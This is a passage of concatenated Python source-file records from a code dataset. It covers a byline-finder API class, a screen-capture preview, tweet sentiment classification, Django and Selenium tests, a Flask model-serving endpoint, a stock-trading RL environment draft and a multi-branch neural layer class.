\"\"\"\n\n # ----------------------------------------------------------------------------------------------------------------\n\n @classmethod\n def construct_from_jdict(cls, jdict):\n if not jdict:\n return None\n\n items = []\n if jdict.get('Items'):\n for item_jdict in jdict.get('Items'):\n item = Byline.construct_from_jdict(item_jdict)\n items.append(item)\n\n next_url = jdict.get('next')\n\n return cls(items, next_url=next_url)\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n def __init__(self, items, next_url=None):\n \"\"\"\n Constructor\n \"\"\"\n self.__items = items # list of Byline\n self.__next_url = next_url # URL string\n\n\n def __len__(self):\n return len(self.items)\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n def next_params(self, _):\n return parse_qs(urlparse(self.next_url).query)\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n def as_json(self):\n jdict = OrderedDict()\n\n if self.items is not None:\n jdict['Items'] = self.items\n jdict['itemCount'] = len(self.items)\n\n if self.next_url is not None:\n jdict['next'] = self.next_url\n\n return jdict\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n @property\n def items(self):\n return self.__items\n\n\n @property\n def next_url(self):\n return self.__next_url\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n def __str__(self, *args, **kwargs):\n return \"BylineFinderResponse:{items:%s, next_url:%s}\" % (Str.collection(self.items), self.next_url)\n","sub_path":"src/scs_core/aws/manager/byline_finder.py","file_name":"byline_finder.py","file_ext":"py","file_size_in_byte":6167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"485616133","text":"import numpy as np\nimport cv2\nimport mss\nimport time\n##\n##sct = mss.mss()\n##screen = {\"left\":0,\"top\":0,\"width\":200,\"height\":200}\n##while(True):\n## img = np.asarray(sct.grab(screen))\n## gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n## cv2.imshow(\"imgs\",img)\n\n \ndef screen_record_efficient():\n # 800x600 windowed mode\n mon = {\"top\":800 , \"left\": 1000, \"width\": 200, \"height\": 200}\n\n title = \"[MSS] FPS benchmark\"\n sct = mss.mss()\n \n\n while (True):\n img = np.asarray(sct.grab(mon))\n\n cv2.imshow(title, img)\n if cv2.waitKey(25) & 0xFF == ord(\"q\"):\n cv2.destroyAllWindows()\n break\n sct.close()\nscreen_record_efficient()\n","sub_path":"detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"200011142","text":"import re\r\nimport csv\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.preprocessing import StandardScaler\r\nimport numpy as np\r\ndef Dictionary():\r\n d={}\r\n with open(\"affective_lexicon.tsv\",\"r\",encoding=\"utf8\") as f:\r\n next(f)\r\n reader = csv.reader(f,delimiter='\\t')\r\n for line in reader:\r\n key = line[0]\r\n value= line[1]\r\n d[key]= value\r\n\r\n return d\r\n\r\nlexicon = Dictionary()\r\n\r\n\r\ndef extract_tweet_sentiments(fname): #we return whichever features we want\r\n def mean(numbers):\r\n return float(sum((list(map(float,numbers))))) / max(len(numbers), 1)\r\n\r\n\r\n def num_tweets(f_name):\r\n i = 0\r\n with open(f_name) as f:\r\n for line in f:\r\n i+=1 # number of lines\r\n return i;\r\n\r\n tweet_num = (num_tweets(fname));\r\n\r\n def word_number(f_name):\r\n with open(f_name) as f:\r\n j = 0\r\n for line in f:\r\n for word in line.split():\r\n j+=1\r\n return j\r\n\r\n tweet_word_number = word_number(fname)\r\n\r\n tweet_words =[[] for _ in range(tweet_num)]\r\n def word_append(f_name):\r\n with open(f_name) as f:\r\n i = 0\r\n for line in f:\r\n for word in line.split():\r\n tweet_words[i].append(word)\r\n i+=1\r\n return 0\r\n\r\n word_append(fname)\r\n\r\n def emoj_finder(f_name):\r\n eyes, noses, happy = r\":;8BX=\", r\"-~'^\", r\")DP\"\r\n neutral = r\"|\"\r\n sad = r\"(/\\ \"\r\n\r\n list =[[] for _ in range(tweet_num)] # i is #tweets and j = 0 #happy, 1 = #neutral , 2 #sad\r\n\r\n pattern0 = \"[%s][%s]?[%s]\" % tuple(map(re.escape, [eyes, noses, happy])) # happy pattern\r\n pattern1 = \"[%s][%s]?[%s]\" % tuple(map(re.escape, [eyes, noses, neutral])) #neutral pattern\r\n pattern2 = \"[%s][%s]?[%s]\" % tuple(map(re.escape, [eyes, noses, sad])) #sad pattern\r\n i = 0\r\n with open(f_name) as f:\r\n for line in f:\r\n if(len(re.findall(pattern0, line)) != 0) :\r\n list[i].append(len(re.findall(pattern0, line))/len(tweet_words[i]))\r\n if(len(re.findall(pattern0, line)) != 0) :\r\n list[i].append(len(re.findall(pattern0, line))/len(tweet_words[i]))\r\n if(len(re.findall(pattern0, line)) != 0) :\r\n list[i].append(len(re.findall(pattern0, line))/len(tweet_words[i]))\r\n\r\n i+=1 # number of lines\r\n #print(list)\r\n return list\r\n\r\n tweet_emjs = emoj_finder(fname)\r\n\r\n def punctuation_finder(f_name):\r\n list = [None]*tweet_num\r\n i = 0\r\n pattern = r'[.?\\-!\",]+'\r\n with open(fname) as f:\r\n for line in f:\r\n list[i] = len(re.findall(pattern, line))/len(tweet_words[i])#punctuation\r\n i+=1\r\n return list\r\n\r\n tweet_punct=punctuation_finder(fname)\r\n\r\n def all_upper_finder(f_name):\r\n list = [None]*tweet_num\r\n i = 0\r\n pattern = r'[A-Z]+'\r\n with open(f_name) as f:\r\n for line in f:\r\n list[i] = len(re.findall(pattern, line))/len(tweet_words[i])#all upper\r\n i+=1\r\n return list\r\n\r\n tweet_upper = all_upper_finder(fname)\r\n\r\n def hashtag_finder(f_name):\r\n list = [None]*tweet_num\r\n i = 0\r\n pattern = r'[#]+'#r'?<=^|(?<=[^a-zA-Z0-9-_\\.]))#([A-Za-z]+[A-Za-z0-9]+'\r\n with open(f_name) as f:\r\n for line in f:\r\n list[i] = len(re.findall(pattern, line))/len(tweet_words[i])\r\n i+=1\r\n return list\r\n\r\n tweet_hashes = hashtag_finder(fname)\r\n\r\n def rep_finder(f_name):\r\n list = [None]*tweet_num\r\n i = 0\r\n pattern = r'(\\w)\\1*?'\r\n with open(f_name) as f:\r\n for line in f:\r\n list[i] = len(re.findall(pattern, line))/len(tweet_words[i])\r\n i+=1\r\n return list\r\n\r\n tweet_reps = rep_finder(fname)\r\n\r\n\r\n def url_finder(f_name):\r\n list = [None]*tweet_num\r\n i = 0\r\n pattern = r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'\r\n with open(fname) as f:\r\n for line in f:\r\n list[i] = len(re.findall(pattern, line))/len(tweet_words[i])\r\n i+=1\r\n return list\r\n\r\n tweet_urls = url_finder(fname)\r\n\r\n def mention_finder(f_name):\r\n list = [None]*tweet_num\r\n i = 0\r\n pattern = r'[@]+'\r\n with open(f_name) as f:\r\n for line in f:\r\n list[i] = len(re.findall(pattern, line))/len(tweet_words[i])#all upper\r\n i+=1\r\n return list\r\n\r\n tweet_mentions = mention_finder(fname)\r\n def word_sentiment(f_name):\r\n list = [[] for _ in range(tweet_num)] #sentiment list for each tweet\r\n i = 0 #tweet index\r\n fail = 0 # number of failures\r\n with open(f_name) as f:\r\n line_list=[]\r\n for line in f:\r\n for word in line.split():\r\n word = word.lower() #remove lowercase and all previous expressions\r\n word = re.sub(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', \"\",word)\r\n word = re.sub(r'[:)(;|/\\.?\\-!~^\",]+', \"\",word)\r\n line_list.append(word)\r\n for j in range(0,len(line_list)-2):\r\n try:\r\n try:\r\n arg = [line_list[j],\" \",(line_list[j+1])] #here we are just formatting the argument\r\n arg = ''.join(arg) #and find its lexicon value\r\n value = lexicon[arg]\r\n list[i].append(value)\r\n except KeyError:\r\n if(j==len(line)-3):\r\n list[i].append(lexicon[line_list[j+2]]) # this is the last word\r\n list[i].append(lexicon[line_list[j]]) #this is the word which didn't pair with the one after it\r\n except KeyError:\r\n fail+=1\r\n continue\r\n i+=1\r\n del line_list[:]\r\n return list\r\n\r\n\r\n tweet_word_sentiments = word_sentiment(fname)\r\n\r\n#tweet statistics extraction\r\n tweet_statistics = [[]for _ in range(0,tweet_num)]\r\n for i in range(0,tweet_num):\r\n tweet_statistics[i].append(mean(tweet_word_sentiments[i]))# mean\r\n tweet_statistics[i].append(min(list(map(float,tweet_word_sentiments[i]))))# min\r\n tweet_statistics[i].append(max((list(map(float,tweet_word_sentiments[i])))))# max\r\n tweet_statistics[i].extend((tweet_reps[i],tweet_punct[i],tweet_upper[i]))\r\n return tweet_statistics\r\n\r\n\r\n##############################################################\r\n##################Classification of Tweets####################\r\n##############################################################\r\n\r\ndef target(fname):\r\n target_data = []*len(tweet_statistics)\r\n with open(fname) as f:\r\n for line in f:\r\n for word in line.split():\r\n target_data.append(word)\r\n\r\n return target_data\r\n\r\ntweet_statistics = extract_tweet_sentiments(\"train.txt\")\r\ntest_statistics = extract_tweet_sentiments(\"test.txt\")\r\ntrain_labels = target(\"train.sen\")\r\ntest_labels = target(\"test.sen\")\r\nscaler = StandardScaler()\r\nscaler.fit(tweet_statistics)\r\nX_train = scaler.transform(tweet_statistics)\r\nscaler.fit(test_statistics)\r\nX_test = scaler.transform(test_statistics)\r\n\r\nclf = MLPClassifier(solver='adam', alpha=1e-5, random_state=1)\r\nclf.fit(X_train, train_labels)\r\n\r\nresults = (clf.predict(X_test))\r\nerror = 0\r\nf = open(\"results.txt\",\"w\")\r\n\r\nfor i in range(0,len(results)):\r\n if results[i] == test_labels[i] :\r\n f.write(results[i] + '\\n')\r\n print(results[i] + '\\n')\r\n continue\r\n else:\r\n f.write(results[i] + '\\n')\r\n print(results[i] + '\\n')\r\n error += 1\r\n\r\nsuccess_rate =1 - error/len(test_labels)\r\nprint(success_rate)\r\n","sub_path":"TSA.py","file_name":"TSA.py","file_ext":"py","file_size_in_byte":8332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"277119758","text":"from unittest.mock import patch, mock_open\nfrom django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom products.models import Product, Category, Favourite\nfrom django.core.management import call_command\nfrom .mock import MOCK_CATEGORIES, MOCK_OPENFF_REQUEST\n\n\nclass TestInitDB(TestCase):\n\n @patch('products.management.commands.init_db.requests.get')\n # replace open by mock_categories\n @patch('builtins.open', mock_open(read_data=MOCK_CATEGORIES))\n def test_init_db(self, mock_request):\n # replace json by mock openff request with only 1 product\n mock_request.return_value.json.return_value = MOCK_OPENFF_REQUEST\n call_command('init_db')\n count = Product.objects.all().count()\n self.assertEquals(count, 1)\n self.assertEquals(\n Product.objects.get(code=3034470003107).name,\n \"Benco original\")\n\n\nclass TestCleanDB(TestCase):\n\n def test_clean_db(self):\n user1 = User.objects.create_user(\n 'user1name',\n 'user1@email.com',\n 'user1password')\n products = [Product.objects.create(code=str(i)) for i in range(2)]\n Category.objects.create(id=\"fr:fruits\")\n Favourite.objects.create(\n healthy_product=products[0],\n unhealthy_product=products[1],\n owner=user1)\n\n # Test clean only Products\n call_command('clean_db')\n count_prod = Product.objects.all().count()\n count_cat = Category.objects.all().count()\n count_fav = Favourite.objects.all().count()\n self.assertEquals(count_prod, 0)\n self.assertEquals(count_cat, 1)\n self.assertEquals(count_fav, 0)\n\n # Test clean also Categories\n call_command('clean_db', '-all')\n count_prod = Product.objects.all().count()\n count_cat = Category.objects.all().count()\n count_fav = Favourite.objects.all().count()\n self.assertEquals(count_prod, 0)\n self.assertEquals(count_cat, 0)\n self.assertEquals(count_fav, 0)\n\n\n","sub_path":"products/tests/test_commands.py","file_name":"test_commands.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"69768840","text":"\n\nfrom xai.brain.wordbase.nouns._gloat import _GLOAT\n\n#calss header\nclass _GLOATING(_GLOAT, ):\n\tdef __init__(self,): \n\t\t_GLOAT.__init__(self)\n\t\tself.name = \"GLOATING\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"gloat\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_gloating.py","file_name":"_gloating.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"518424644","text":"import numpy as np\nfrom flask import Flask, request, jsonify\nimport pickle\nfrom tensorflow.keras.models import load_model\nimport pandas as pd\n\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\n\nimport tensorflow as tf\n\n#from tensorflow.keras.models import *\n#from tensorflow.keras.layers import *\n#from tensorflow.keras import backend as K\n\n\n\napp = Flask(__name__)\nautoencoder = load_model('model.h5')\n\nwith open('scaler.pkl', 'rb') as f:\n scaler = pickle.load(f)\n\nnodes = {'Bilbao, Basque Country, Spain': 1,\n 'Casablanca, Casablanca-Settat, Morocco': 3,\n 'Hamburg, Hamburg, Germany': 2,\n 'Kolwezi, Lualaba, Democratic Republic of the Congo': 4,\n 'Lysekil, Västra Götaland, Sweden': 10,\n 'Québec, Quebec, Canada': 8,\n 'Rotterdam, South Holland, Netherlands': 6,\n 'Shinkolobwe, Haut-Katanga, Democratic Republic of the Congo': 9,\n 'Skellefteå Airport, Västerbotten, Sweden': 7,\n 'Turku, Finland Proper, Finland': 5,\n 'Turku, Southwest Finland, Finland': 0}\n\n@app.route('/api',methods=['POST'])\ndef predict():\n # Get the data from the POST request.\n data = request.get_json(force=True) # Make prediction using model loaded from disk as per the data.\n frm = data['from']\n frm = nodes[frm]\n frm = np.eye(11)[frm]\n to = data['to']\n to = nodes[to]\n to = np.eye(11)[to]\n t = np.array([data['time']])\n t = scaler.transform(t.reshape(1, -1))\n\n print('from: ', frm)\n print('to: ', to)\n print('time: ', t)\n data = [[frm], [to], t]\n print('data is: ', data)\n score = autoencoder.evaluate(data, data)\n output = score[0]\n return jsonify(output)\n\n\nif __name__ == '__main__':\n app.run(port=5000, debug=True)\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"118266730","text":"import unittest, time, logging\nfrom TestforUS1.webdriverFactory import WebdriverFactory\nfrom TestforUS1.Pages.welcomePage import Welcome\nfrom TestforUS1.Pages.loginPage import Login\nfrom TestforUS1.dataTests import DataTest\nfrom TestforUS1.Pages.mainUserPage import MainUserPage\nfrom TestforUS1.Pages.paymentsPage import PaymentsPage, PopupUtilityDetails, PopupSelectPaymentSum, PopupEasyPay\n\nclass Test(unittest.TestCase):\n\n def setUp(self):\n self.driver = WebdriverFactory.getWebdriver(DataTest.browser)\n self.driver.get(DataTest.url['home'])\n self.welcomePage = Welcome(self.driver)\n self.loginPage = Login(self.driver)\n self.mainUserPage = MainUserPage(self.driver)\n self.paymentPage = PaymentsPage(self.driver)\n self.utilityDetailsPopup = PopupUtilityDetails(self.driver)\n self.selectSumPopup = PopupSelectPaymentSum(self.driver)\n self.easyPayPopup = PopupEasyPay(self.driver)\n\n def getToPaymentDetailsPopup(self):\n self.welcomePage.signIn()\n self.loginPage.login(DataTest.popupEasyPay['email'],\n DataTest.popupEasyPay['password'])\n self.mainUserPage.getToPaymentPage()\n self.paymentPage.getPaymentDetails()\n\n def loggerInfo(self,name):\n self.logger = logging.getLogger()\n self.logger.info(\"_\" * 10 + name)\n\n def testCheckNoSaveCvcAfterRefresh(self):\n name = unittest.TestCase.id(self)\n self.loggerInfo(name)\n self.getToPaymentDetailsPopup()\n self.utilityDetailsPopup.clickButtonPay()\n\n self.selectSumPopup.enterInputSum(DataTest.sumValue)\n self.selectSumPopup.clickBtnDownload()\n self.selectSumPopup.clickBtnProceed()\n\n self.easyPayPopup.getToIframe()\n self.easyPayPopup.fillPopupEasyPayFields(DataTest.popupEasyPay['cardNumber'],\n DataTest.popupEasyPay['dateCard'],\n DataTest.popupEasyPay['cvNumber'])\n\n self.driver.refresh()\n\n self.paymentPage.getPaymentDetails()\n self.utilityDetailsPopup.clickButtonPay()\n\n self.selectSumPopup.enterInputSum(DataTest.sumValue)\n self.selectSumPopup.clickBtnDownload()\n self.selectSumPopup.clickBtnProceed()\n\n self.easyPayPopup.getToIframe()\n\n self.cvNumber = self.easyPayPopup.getCvNumber()\n self.assertEqual(self.cvNumber, '')\n\n def testCheckNoSaveCardDataAfterRefresh(self):\n name = unittest.TestCase.id(self)\n self.loggerInfo(name)\n self.getToPaymentDetailsPopup()\n self.utilityDetailsPopup.clickButtonPay()\n\n self.selectSumPopup.enterInputSum(DataTest.sumValue)\n self.selectSumPopup.clickBtnDownload()\n self.selectSumPopup.clickBtnProceed()\n\n self.easyPayPopup.getToIframe()\n self.easyPayPopup.fillPopupEasyPayFields(DataTest.popupEasyPay['cardNumber'],\n DataTest.popupEasyPay['dateCard'],\n DataTest.popupEasyPay['cvNumber'])\n\n self.driver.refresh()\n\n self.paymentPage.getPaymentDetails()\n self.utilityDetailsPopup.clickButtonPay()\n\n self.selectSumPopup.enterInputSum(DataTest.sumValue)\n self.selectSumPopup.clickBtnDownload()\n self.selectSumPopup.clickBtnProceed()\n\n self.easyPayPopup.getToIframe()\n\n cardNumber = self.easyPayPopup.getCardNumber()\n self.assertEqual(cardNumber, '')\n\n def testCheckBalanceAfterPay(self):\n name = unittest.TestCase.id(self)\n self.loggerInfo(name)\n self.getToPaymentDetailsPopup()\n\n balanceValue1 = self.paymentPage.getBalanceValue()\n self.utilityDetailsPopup.clickButtonPay()\n\n self.selectSumPopup.enterInputSum(DataTest.sumValue)\n self.selectSumPopup.clickBtnDownload()\n self.selectSumPopup.clickBtnProceed()\n\n self.easyPayPopup.getToIframe()\n self.easyPayPopup.fillPopupEasyPayFields(DataTest.popupEasyPay['cardNumber'],\n DataTest.popupEasyPay['dateCard'],\n DataTest.popupEasyPay['cvNumber'])\n self.easyPayPopup.clickRememberMe()\n self.easyPayPopup.fillAdditionalFieldsPopupEasy(DataTest.popupEasyPay['zipCode'],\n DataTest.popupEasyPay['phone'],\n DataTest.popupEasyPay['mail'])\n self.easyPayPopup.clickBackPopupEasy()\n\n self.driver.switch_to.default_content()\n time.sleep(10)\n self.driver.get(DataTest.url['paymentsPage'])\n balanceValue2 = self.paymentPage.getBalanceValue()\n result = balanceValue2 - balanceValue1\n self.assertEquals(result, float(DataTest.sumValue))\n\n def tearDown(self):\n self.driver.close()","sub_path":"Tests/testAllSviat.py","file_name":"testAllSviat.py","file_ext":"py","file_size_in_byte":4934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"159888088","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 24 15:08:43 2019\n\n@author: s-long.bao\n\"\"\"\n\n\n# import libraries\nimport os\nimport sys\nimport gc\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Dense, Input\nfrom tensorflow.keras.optimizers import Adam\nfrom sklearn.preprocessing import StandardScaler\n\n# data clean\nroot_dir = r'C:\\Data_Science_Projects\\7.Stock_Recommender\\data\\market_info'\ndata_dir = r'C:\\Data_Science_Projects\\10.DDPG\\data'\n\ndef read_data(root_dir,data_dir,stocks=None):\n # create daily return for stocks\n file_name ='preprocessed_stock_price.csv'\n if os.path.isfile(os.path.join(data_dir,file_name)):\n print(\"read stock price data ...\")\n df_last = pd.read_csv(os.path.join(data_dir,file_name),index_col=0)\n else:\n print(\"preprocess stock price data ...\")\n df = pd.read_csv(os.path.join(root_dir,'stock_price_20160101_20191031.csv'))\n df.columns = df.columns.map(lambda s:s.lower())\n df.day = pd.to_datetime(df.day)\n df.set_index('day',inplace=True)\n \n df_last = pd.pivot_table(df,columns='dscr_cd',values='off_last',index=df.index)\n # df_last = df_last.dropna(axis='columns')\n # df_last = df_last.replace(0, np.nan)\n # df_last = df_last.fillna(method='ffill')\n \n df_last = df_last.fillna(method='ffill')\n df_last = df_last.dropna(axis='columns')\n \n df_last = df_last.pct_change().dropna()\n df_last = df_last.loc[:,df_last.sum()!=0]\n df_last.to_csv(os.path.join(data_dir,file_name))\n \n # return selected stocks \n if stocks:\n df_last = df_last[stocks]\n return df_last\n\n\n# create environment\nclass MultiStockEnv:\n \"\"\"\n A n stock trading environment\n State vector of size (n + n + 1)\n # shares of stock n owned\n # price of stock n\n # cash own\n Action: \n \"\"\"\n def __init__(self, data, initial_investment=20000):\n # data\n self.stock_price_history = data\n self.n_step, self.n_stock = self.stock_price_history.shape\n \n # instance attributes\n self.initial_investment = initial_investment\n self.cur_step = None\n self.stock_owned = None\n self.stock_price = None\n self.cash_in_hand = None\n # self.action_space = \n self.state_dim = self.n_stock * 2 + 1\n self.reset()\n \n def reset(self):\n self.cur_step = 0\n self.stock_owned = np.zeros(self.n_stock)\n self.stock_price = self.stock_price_history[self.cur_step]\n self.cash_in_hand = self.initial_investment\n return self._get_obs()\n \n def setp(self, action):\n # asset action in self.action_space\n prev_val = self._get_val()\n \n # update price, i.e. go to the next day\n self.cur_step += 1\n self.stock_price = self.stock_price_history[self.cur_step]\n \n # perform the trade\n self._trade(action)\n \n # get the new.value after taking the action\n cur_val = self._get_val()\n \n # reward is the increase in portfoilo value\n reward = cur_val - prev_val\n \n # done if we have run out of data\n done = self.cur_step == self.n_step - 1\n \n # store the current value of the portfolio here\n info = {'cur_val': cur_val}\n \n # conform to Gym API\n return self._get_obs(), reward, done, info\n \n def _get_obs(self):\n obs = np.empty(self.state_dim)\n obs[:self.n_stock] = self.stock_owned\n obs[self.n_stock:2*self.n_stock] = self.stock_price\n obs[-1] = self.cash_in_hand\n return obs\n \n def _get_val(self):\n return self.stock_owned.dot(self.stock_price) + self.cash_in_hand\n \n def _tarde(self, action):\n self.stock_owned = self.stock_owned + action\n self.cash_in_hand = self.cash_in_hand + action.dot(self.stock_price)\n \n \n \n \n \n \n \n \n \n \n \n ","sub_path":"QuantitativeFinance/4.DDPG/bkup/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":4152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"532587740","text":"from django.urls import re_path, path\n\nfrom . import views\n\napp_name = 'ss_users'\n\nurlpatterns = [\n path('id/', views.user_page, name='user_page'),\n path('login/', views.login, name='login'),\n path('logout/', views.logout, name='logout'),\n path('registration/', views.registration, name='registration'),\n path('email/', views.email, name='email'),\n path('activate/uid=/token=/', views.activate_user_email, name='activate'),\n]\n","sub_path":"ss_users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"142219013","text":"\r\nalien_0 = {\r\n 'color':'blue',\r\n 'x-position':23,\r\n 'y-position':54,\r\n 'speed':'fast'\r\n }\r\n\r\nalien_0['color'] = 'red'\r\nalien_0['speed'] = 'slow'\r\nalien_0['gun_point'] = 55\r\n\r\nprint('\\nThe '+alien_0['color']+' alien position is '+str(alien_0['x-position'])+','+str(alien_0['y-position']))\r\nif alien_0['color'] == 'green':\r\n color_point = 5\r\nelif alien_0['color'] == 'blue':\r\n color_point = 10\r\nelse:\r\n color_point = 8\r\n\r\nif alien_0['speed'] == 'slow':\r\n x_increment = 1\r\n y_increment = 1\r\nelif alien_0['speed'] == 'medium':\r\n x_increment = 2\r\n y_increment = 2\r\nelse:\r\n x_increment = 3\r\n y_increment = 2\r\n\r\nif alien_0['gun_point'] > 50:\r\n gun_p = 100\r\nelif alien_0['gun_point'] > 100:\r\n gun_p = 200\r\nelse:\r\n gun_p = 300\r\n \r\ntotal_point = color_point + gun_p\r\n\r\nalien_0['x-position'] = alien_0['x-position'] + x_increment\r\nalien_0['y-position'] = alien_0['y-position'] + y_increment\r\nprint('\\nThe '+alien_0['color']+' alien position is '+str(alien_0['x-position'])+','+str(alien_0['y-position']))\r\nprint('\\nAnd the Total Point is '+str(total_point))\r\n\r\n\r\n\r\n","sub_path":"alien_ex2.py","file_name":"alien_ex2.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"431686217","text":"import tensorflow as tf\nimport numpy as np\nfrom models.layer_cascade import LayerCascade\n\n\nclass LayerMultiBranch:\n\tdef __init__(self, _id, branches, merge=None, in_bottle=None, out_bottle=None):\n\t\tself._id = _id\n\t\tself.in_bottle = in_bottle\n\t\tself.branches = branches\n\t\tself.out_bottle = out_bottle\n\t\tself.merge = merge\n\t\tif self.merge == 'add':\n\t\t\tout_dim = []\n\t\t\tfor branch in self.branches:\n\t\t\t\tout_dim.append(branch.out_features_dim)\n\t\t\tassert np.std(out_dim) == 0, '<%s> require the output dim of all branches are the same' % self.merge\n\t\telif self.merge is None:\n\t\t\tassert len(self.branches) == 1, 'Invalid'\n\t\t\n\t\tself.output_op = None\n\t\n\t@property\n\tdef id(self):\n\t\treturn self._id\n\t\n\t@id.setter\n\tdef id(self, value):\n\t\tself._id = value\n\t\n\t@property\n\tdef out_features_dim(self):\n\t\tif self.out_bottle:\n\t\t\treturn self.out_bottle.out_features_dim\n\t\tout_dim = []\n\t\tfor branch in self.branches:\n\t\t\tout_dim.append(branch.out_features_dim)\n\t\tif self.merge == 'concat':\n\t\t\treturn np.sum(out_dim)\n\t\telif self.merge == 'add' or self.merge is None:\n\t\t\treturn out_dim[0]\n\t\telse:\n\t\t\tpass\n\t\n\t@property\n\tdef depth(self):\n\t\tdepth = 0\n\t\tif self.in_bottle:\n\t\t\tdepth += self.in_bottle.depth\n\t\tif self.out_bottle:\n\t\t\tdepth += self.out_bottle.depth\n\t\tbranch_depth = []\n\t\tfor branch in self.branches:\n\t\t\tbranch_depth.append(branch.depth)\n\t\tdepth += np.max(branch_depth)\n\t\treturn depth\n\t\n\tdef get_str(self):\n\t\tin_bottle_str = 'N' if self.in_bottle is None else self.in_bottle.get_str()\n\t\tbranches_str = [branch.get_str() for branch in self.branches]\n\t\tbranches_str = '+'.join(branches_str)\n\t\tout_bottle_str = 'N' if self.out_bottle is None else self.out_bottle.get_str()\n\t\treturn '%s~%s~%s' % (in_bottle_str, branches_str, out_bottle_str)\n\t\n\tdef build(self, _input, densenet, store_output_op=False):\n\t\twith tf.variable_scope(self._id):\n\t\t\toutput = _input\n\t\t\t# in bottle\n\t\t\tif self.in_bottle:\n\t\t\t\toutput = self.in_bottle.build(output, densenet, store_output_op=store_output_op)\n\t\t\t# branches\n\t\t\tbranch_out = []\n\t\t\tfor branch in self.branches:\n\t\t\t\tbranch_out.append(branch.build(output, densenet, store_output_op=store_output_op))\n\t\t\tif self.merge == 'concat':\n\t\t\t\toutput = tf.concat(branch_out, axis=3)\n\t\t\telif self.merge == 'add':\n\t\t\t\toutput = tf.add_n(branch_out)\n\t\t\telif self.merge is None:\n\t\t\t\toutput = branch_out[0]\n\t\t\telse:\n\t\t\t\traise ValueError('Do not support <%s>' % self.merge)\n\t\t\t# out bottle\n\t\t\tif self.out_bottle:\n\t\t\t\toutput = self.out_bottle.build(output, densenet, store_output_op=store_output_op)\n\t\tif store_output_op:\n\t\t\tself.output_op = output\n\t\treturn output\n\t\n\tdef get_config(self):\n\t\treturn {\n\t\t\t'_id': self._id,\n\t\t\t'merge': self.merge,\n\t\t\t'branches': [branch.get_config() for branch in self.branches],\n\t\t\t'in_bottle': None if self.in_bottle is None else self.in_bottle.get_config(),\n\t\t\t'out_bottle': None if self.out_bottle is None else self.out_bottle.get_config(),\n\t\t}\n\t\n\tdef renew_init(self, densenet):\n\t\treturn {\n\t\t\t'_id': self._id,\n\t\t\t'branches': [branch.renew_init(densenet) for branch in self.branches],\n\t\t\t'in_bottle': None if self.in_bottle is None else self.in_bottle.renew_init(densenet),\n\t\t\t'out_bottle': None if self.out_bottle is None else self.out_bottle.renew_init(densenet),\n\t\t}\n\t\n\t@staticmethod\n\tdef set_from_config(config_json, init=None):\n\t\t_id = config_json['_id']\n\t\tmerge = config_json['merge']\n\t\tbranches = []\n\t\tfor _i, branch_config in enumerate(config_json['branches']):\n\t\t\tbranch_init = init['branches'][_i] if init is not None else None\n\t\t\tbranch = LayerCascade.set_from_config(branch_config, branch_init)\n\t\t\tbranches.append(branch)\n\t\tin_bottle = config_json['in_bottle']\n\t\tif in_bottle:\n\t\t\tin_bottle_init = init['in_bottle'] if init is not None else None\n\t\t\tin_bottle = LayerCascade.set_from_config(in_bottle, in_bottle_init)\n\t\tout_bottle = config_json['out_bottle']\n\t\tif out_bottle:\n\t\t\tout_bottle_init = init['out_bottle'] if init is not None else None\n\t\t\tout_bottle = LayerCascade.set_from_config(out_bottle, out_bottle_init)\n\t\treturn LayerMultiBranch(_id, branches, merge, in_bottle=in_bottle, out_bottle=out_bottle)\n\t\n\t\"\"\"\n\tNetwork Transformation Operations\n\t\"\"\"\n\t\n\tdef prev_widen(self, indices, magnifier, noise=None):\n\t\tif self.in_bottle:\n\t\t\tself.in_bottle.prev_widen(indices, magnifier, noise=noise)\n\t\telse:\n\t\t\tfor branch in self.branches:\n\t\t\t\tbranch.prev_widen(indices, magnifier, noise=noise)\n\t\n\tdef widen(self, loc, new_width, widen_type='output_dim', noise=None):\n\t\tif loc['multi-branch'] == 'in_bottle':\n\t\t\tassert self.in_bottle is not None, 'Invalid'\n\t\t\tchange_out_dim, indices, magnifier = self.in_bottle.widen(loc['layer'], new_width, widen_type, noise=noise)\n\t\t\tif change_out_dim:\n\t\t\t\tfor 